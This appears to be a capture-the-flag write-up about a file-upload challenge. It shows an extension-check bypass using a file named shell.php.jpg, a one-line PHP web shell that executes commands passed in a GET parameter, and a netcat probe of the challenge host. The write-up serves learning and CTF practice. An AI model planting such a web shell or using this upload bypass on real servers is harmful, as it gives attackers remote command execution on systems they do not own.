There is only one form that accepts a file.
The validation of the file is based on extension so we can try and upload shell.php.jpg
image with content like this:
<?=`$_GET[0]`?>
When image is uploaded we see the page like this:
Click on See image and we see a blank page with some strange PHP errors. It’s because our “image” expects get param called “0” so let’s add one.
The image above is what we see when visiting the challenge URL (104.197.195.221:8087
)
That’s strange. Initially I thought the site is down but it’s fine.
Let’s try to connect with NetCat and see what the server tell us and why browser can’t display it.
nc -vvv 104.197.195.221 8087
and response we get back is:
221.195.197.104.bc.googleusercontent.com [104.197.195.221] 8087 (?) open
SSH-2.0-OpenSSH_7.9p1 Debian-10+deb10u2
Doesn’t look like valid HTTP resopnse lol. Ok now we know that SSH server is running on that port so let’s try to connect.